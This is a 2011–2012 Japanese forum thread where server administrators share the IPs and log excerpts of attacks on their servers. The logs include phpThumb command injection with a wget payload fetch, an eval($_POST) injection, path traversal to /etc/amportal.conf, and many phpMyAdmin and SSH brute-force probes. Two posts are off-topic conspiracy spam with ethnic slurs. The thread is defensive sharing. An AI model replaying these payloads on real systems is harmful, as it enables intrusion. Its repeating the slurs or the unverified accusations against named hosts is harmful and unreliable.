アタックNo1してきたIPを晒すスレ

1 ：DNS未登録さん：2011/02/01(火) 23:36:21 ID:???.net

涙が出ちゃう

101 ：DNS未登録さん：2011/09/02(金) 20:25:03.05 ID:EWkDqbhU.net

126.26.247.186　

102 ：DNS未登録さん：2011/09/03(土) 15:39:24.21 ID:???.net

sdcドメインはクズ。

103 ：DNS未登録さん：2011/11/03(木) 01:26:14.18 ID:lpY38TUY.net

79.143.179.235 - - [02/Nov/2011:23:49:33 +0900] "GET /webdav/sprint.php?act=phptools&host=66.135.60.226&time=90&port=29465 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:17:19 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=49648 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:21:27 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=51349 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:45:24 +0900] "GET /webdav/sprint.php?act=phptools&host=66.246.127.81&time=90&port=80 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:52:05 +0900] "GET /webdav/sprint.php?act=phptools&host=81.229.44.61&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:00:03 +0900] "GET /webdav/sprint.php?act=phptools&host=90.230.138.205&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:09:07 +0900] "GET /webdav/sprint.php?act=phptools&host=83.226.50.111&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"

こんなふうにパラメータ変えてアタックしてくる。
もう１週間くらい同じIPからのアタックが続いてるよ、逆引きすると
backup01.xsltel.me

104 ：DNS未登録さん：2011/11/03(木) 13:25:08.00 ID:???.net

？(？？？ ) ？

105 ：DNS未登録さん：2011/11/03(木) 17:40:46.68 ID:???.net

>103
特定できてるなら、ブロックすりゃ済む話だろ...

106 ：DNS未登録さん：2011/11/03(木) 22:58:30.29 ID:???.net

このスレはそのアタックNo1してきたURIやら状況を書いて
みんなに参考にしてもらうための情報共有スレなんですけどね

107 ：DNS未登録さん：2011/11/29(火) 14:05:13.01 ID:???.net

>>105
スレタイ嫁ｋｓ

108 ：DNS未登録さん：2011/11/29(火) 20:48:34.88 ID:???.net

# grep 222.229.65.227 auth.log|head -2
Nov 27 20:27:38 あああ sshd[9857]: Did not receive identification string from 222.229.65.227
Nov 27 20:31:55 あああ sshd[10280]: Failed password for invalid user root from 222.229.65.227 port 35862 ssh2

# grep 222.229.65.227 auth.log|tail -1
Nov 27 21:05:45 あああ sshd[15613]: Failed password for invalid user root from 222.229.65.227 port 43733 ssh2

# grep 222.229.65.227 auth.log|wc
1846 25606 185870

# host iacp-gw.kochi-tech.ac.jp
iacp-gw.kochi-tech.ac.jp has address 222.229.65.227

管理者がんがれ〜。

109 ：DNS未登録さん：2011/12/13(火) 03:47:11.79 ID:???.net

アタック25

110 ：八犬伝＝γδεζηθ＝еёжЭЮЯабЧЦХЛθ：2011/12/16(金) 18:10:07.04 ID:bCBmaI9m.net

２００２の「アルゼンチンvsイングランド」と「決勝」を朝鮮総連を騙し、観戦した少頭劣一族のアミ…立て籠り犯 朝鮮総連 少頭劣一族の真の最終目的は 徳川の財産を全て奪い
日本の芸能人を多数 中国へ拉致し、
あちらで更に監禁し働かせ
自分達家族は優雅に国に土地を買い
自分達の国にし遊んで暮らすつもりだった。
日本の芸能人を色々な奴隷にすると言っていた。日本列島は棄てる。
中国へ帰る家族のみが立て籠り犯だ。
次に狙うのはイタリアだったらしい。
おまぬ〜！
フィリピンの范蘭と西太后の所からモンゴルに逃げた『シバ』の子達だ。

111 ：DNS未登録さん：2011/12/18(日) 16:05:00.40 ID:???.net

同一プロバイダから昨日と今日で3回アタックしてきやがった
114.51.19.152

112 ：Elena Oda Vintevecom Lamcasta：2011/12/19(月) 17:42:04.86 ID:XWUKhFPO.net

今、まともなサーバーは Googleのみ。
確認するべき。

Googleで
インターネットテレビ 朝鮮総連 少頭劣一族 自民党 立て籠 人質(又はハッキング)
を検索して 各方面に連絡お願い致します。

インターネットテレビ 自分の本名 ８桁の生年月日
で自分の犯罪も分かるかも。

掟破りのコピペ犯は私です。
犯罪解決の為に 朝鮮人と華喃 少頭劣一族＝蔗冽一族と日本中…更にGoogleで御覧の世界中の方々に閲覧して頂いております。
２チャンも私が貼る場所は閲覧して頂いております。
人質は 世界中の国のトップと国連とFreemason 全メンバーですから…日本中愚か者ばかりで嘆かわしい限り。

113 ：DNS未登録さん：2011/12/20(火) 02:27:06.15 ID:???.net

韓国人の俺が記念カキコ

114 ：DNS未登録さん：2011/12/22(木) 10:56:56.35 ID:???.net

毎日同一人物だと思われるｋｓからアタックされ続けている

94.23.45.14 - - [20/Dec/2011:11:31:26 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.35.108 - - [20/Dec/2011:12:06:05 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:13:58:33 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:16:50:56 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
184.173.248.10 - - [20/Dec/2011:18:32:53 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:19:52:26 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.163.199 - - [20/Dec/2011:21:46:59 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
207.109.164.19 - - [20/Dec/2011:22:12:50 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:23:43:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.185.197 - - [21/Dec/2011:12:19:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:14:58:07 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:16:51:15 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:18:47:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:20:44:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
50.19.21.165 - - [21/Dec/2011:21:33:18 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
1.115.18.174 - - [21/Dec/2011:22:37:54 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"

115 ：DNS未登録さん：2011/12/27(火) 05:53:44.16 ID:???.net

国籍調べたらどうもフランスらしいけど、フランスの糞餓鬼かな　コロスぞ　ゴラァ

91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tm
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wge
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.7

116 ：DNS未登録さん：2011/12/27(火) 09:14:56.24 ID:???.net

>>115
whois情報だとdedicated serverって書いてあるから、
レンタルサーバか何かだろう。

あとphpThumb()と呼ばれるツールの脆弱性を突いて、
サーバ上でコマンドを実行しようとしているところから
すると、おそらく対象のサーバは乗っ取られんではないかな。

117 ：DNS未登録さん：2012/01/09(月) 07:21:01.65 ID:/sz8vKGE.net

IPアドレス 175.105.126.4
ホスト名 4.126.105.175.ap.yournet.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 種別不明
都道府県 大阪府
IPひろば検索ランキング 17位 (48Point)

118 ：DNS未登録さん：2012/01/09(月) 14:27:12.55 ID:QzdgOEVS.net

安藤優子、木村太郎は、某プロパイダの社外取締役、かつ、安藤は、フジ社外の人間にもかかわらず、フジテレビジョンのM&Aの最中、フジのホワイトナ
イトの【親会社】の本業を無視して、「インターネットは虚業だ。具体性がない
。」というようなことをコメントしました。この虚業は、livedoorを指していた
としても、「同業者」であったということは、非常に、違和感を感じずには、い
られません。

119 ：DNS未登録さん：2012/01/10(火) 06:06:43.39 ID:???.net

78.46.89.6 (liventura-grid.com)

2012/01/08,09:41:21,"-",GET,"/muieblackcat","","1.1",403,3075,"-","","-"
2012/01/08,09:41:22,"-",GET,"//index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:23,"-",GET,"//admin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/pma/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:25,"-",GET,"//db/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:26,"-",GET,"//dbadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:27,"-",GET,"//myadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:28,"-",GET,"//mysql/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:29,"-",GET,"//mysqladmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:30,"-",GET,"//typo3/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:31,"-",GET,"//phpadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:32,"-",GET,"//phpMyAdmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin1/index.php","","1.1",403,3075,"-","","-"
以下pma関係を主に百数十回

120 ：DNS未登録さん：2012/01/10(火) 07:57:02.93 ID:???.net

>>119
セキュリティホールを突いてくるなんてどこのどいつだよ、
と思ったらドイツだった。

121 ：DNS未登録さん：2012/02/24(金) 15:30:49.31 ID:???.net

久しぶりに来た
184.105.65.228 guardlayer.com - 2012-02-24 10:06:04 GET /muieblackcat HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //db/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //dbadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //myadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //mysql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //mysqladmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //typo3/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //xampp/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //websql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin-2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.3/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.5.1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.4/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.7/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:16 GET //phpMyAdmin-2.5.7-pl1/index.php HTTP/1.1 404 385 - -

122 ：DNS未登録さん：2012/02/24(金) 22:18:52.87 ID:???.net

>>121
うちでも13時と20時頃に同じのが来てるわ

123 ：DNS未登録さん：2012/02/27(月) 15:21:12.38 ID:6b+wEirL.net

175.194.234.79 - - [26/Feb/2012:14:10:46 +0900] "R\xb7\x95\xda\x87\x9c\xffX\xa1\xb8\x9d\x04g\x9d\xc0\x9c\x96\xde\x1e\xdd\x18\xf6\\\"\x07\xb1\xed\xcb\xe4\xfbT\xa1\xf3\xe8\x82\x9c\x16@\xfe\x1b\xf3+\xb1" 501 335 "-" "-"
なにこれ怖い
韓国(´・д・｀)ﾔﾀﾞ

124 ：DNS未登録さん：2012/03/03(土) 12:42:17.26 ID:???.net

Googleから大量アクセスの一部
検索用botとはまた違うみたいだ

74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Blackberry8520/5.0.0.822 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (Series40; NokiaC3-00/03.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.0.10.15
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - SAMSUNG-GT-C3200/1.0 NetFront/3.5 Profile/M IDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Opera/9.50 (J2ME/MIDP; Opera Mini/4.0.8462/8; U; en)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Nokia6820/2.0 (4.83) Profile/MIDP-1.0 Configuration/CLDC-1.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - SoftBank/1.0/920SH/SHJ001 Browser/NetFront/3.4 Profile/MIDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - KDDI-CA3A UP.Browser/6.2.0.13.2 (GUI) MMP/2.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - DoCoMo/2.0 P906i(c100;TB;W24H15)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413

125 ：DNS未登録さん：2012/03/11(日) 20:16:26.37 ID:???.net

70.62.198.26
rrcs-70-62-198-26.central.biz.rr.com
しつこい

126 ：DNS未登録さん：2012/03/13(火) 13:35:01.04 ID:???.net

荒らしやめろ

ip：218.218.181.166
host：KYNfb-02p1-166.ppp11.odn.ad.jp
UA：Opera/9.80 (Windows NT 6.0; U; ja) Presto/2.10.229 Version/11.61

127 ：DNS未登録さん：2012/03/13(火) 18:02:50.59 ID:???.net

>126
国内なら相手ISPにログ付きで苦情を送れ。大抵それで方がつく。

128 ：DNS未登録さん：2012/03/14(水) 12:25:43.44 ID:???.net

甘いところだと注意しただけで大して変わらないこともあるけどね
厳しいところは一発で回線停止されるけど
odnはどうだったかな…

129 ：DNS未登録さん：2012/03/25(日) 17:27:49.33 ID:???.net

"217.36.211.177""2012-03-23 00:57:42""ETCSERVER01""""""""""AUTH=EFAIL:TYPE=LOGIN""" "0""host217-36-211-177.in-addr.btopenworld.com"
8000行あった。数秒おきに 16時間・・・

130 ：DNS未登録さん：2012/05/11(金) 23:49:56.91 ID:???.net

64.27.15.56　アメリカunassigned.calpop.com
メール鯖にアタックしてくる

131 ：DNS未登録さん：2012/05/12(土) 19:12:28.08 ID:???.net

116.126.87.154 韓国
[Sat May 12 00:47:09 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :81/phpmyadmin/scripts/setup.php HTTP/1.1

他137種類のattack
？？？

132 ：DNS未登録さん：2012/05/13(日) 23:47:03.33 ID:???.net

日本国内からのポートスキャン、クラックツール実行

49.252.168.148
EM49-252-168-148.pool.e-mobile.ne.jp.

133 ：DNS未登録さん：2012/05/25(金) 10:24:33.62 ID:???.net

217.41.19.142

dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Disconnected (no auth attempts): rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx

134 ：DNS未登録さん：2012/05/28(月) 11:47:02.67 ID:???.net

[error] [client 65.74.155.211] File does not exist: /var/www/html/translators.html
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpmyadmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpMyAdmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/pma
[error] [client 65.74.155.211] File does not exist: /var/www/html/mysql

135 ：DNS未登録さん：2012/05/31(木) 00:08:01.47 ID:???.net

日本国内からくる奴は、OCNが多いが理由があるのだろうか？

136 ：DNS未登録さん：2012/05/31(木) 02:45:10.02 ID:???.net

ユーザ数

137 ：DNS未登録さん：2012/05/31(木) 22:48:38.01 ID:???.net

YokozunaNETという謎のISPからDDOS食らった

138 ：DNS未登録さん：2012/06/01(金) 11:34:04.46 ID:???.net

モンゴルかｗ

139 ：DNS未登録さん：2012/08/01(水) 22:49:19.71 ID:???.net

ポート２２に侵入しようとしてくる
www23111u.sakura.ne.jp
www3079uh.sakura.ne.jp
www7183ue.sakura.ne.jp
www18135ue.sakura.ne.jp

140 ：DNS未登録さん：2012/08/06(月) 04:40:39.11 ID:???.net

ssh（dd_ssh）攻撃

1.33.202.193
el-labo-s1.el-labo.jp

141 ：DNS未登録さん：2012/08/13(月) 09:46:36.18 ID:???.net

このスレまだあるんだね。
ssh対策なら、denyhosts動かしておけば自動収集してくれるのに。
purge_deny=1yにしておいたら、こんなに収集してくれたよ。

% egrep ^sshd /etc/hosts.deny | wc -l
968

142 ：DNS未登録さん：2012/08/15(水) 17:20:46.24 ID:???.net

218.67.246.197 [2012.8/07-18:53:47 +0900] "POST /index.php/module/action/param1/$%7B@print(eval($_POST%5Bc%5D))%7D HTTP/1.1" 404 REF:-

143 ：DNS未登録さん：2012/08/17(金) 07:53:18.68 ID:???.net

>>141
こいつ馬鹿だわ
期間も書かずに、こんなにとか言ってるし

144 ：DNS未登録さん：2012/08/19(日) 17:46:16.25 ID:???.net

夏だねぇ。
purge_deny=1y
の意味ぐらい調べてから書けば良いのに。

145 ：DNS未登録さん：2012/08/19(日) 19:09:29.95 ID:???.net

そういう意味じゃないと思われ
夏だな、電波野郎しかいないのか

146 ：DNS未登録さん：2012/08/21(火) 16:50:28.60 ID:???.net

2012/08/21,03:07:39,122.154.101.54,"","-","-",GET,"/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php","module_name=../../../../../../../..//etc/amportal.conf","1.1",403,1041,"-","","-"

147 ：DNS未登録さん：2012/08/22(水) 21:59:46.11 ID:???.net

1年でpurgeするのだから、1年分の収集だろうが... ヤレヤレ。

148 ：DNS未登録さん：2012/09/18(火) 20:47:17.39 ID:Iu7w4W0H.net

203.91.121.70

毎日一万回以上うちのサーバーにssh総当たりしてくる

何か怖い

149 ：DNS未登録さん：2012/09/19(水) 00:57:11.55 ID:???.net

>>148
そう思ってる奴は他にもいる
ttp://ip-address-lookup-v4.com/ip/203.91.121.70

150 ：DNS未登録さん：2012/09/22(土) 21:35:02.21 ID:???.net

58.183.165.251
違法物をやりとりするサーバーを立てています。
http://awabi.2ch.net/test/read.cgi/download/1347785389/
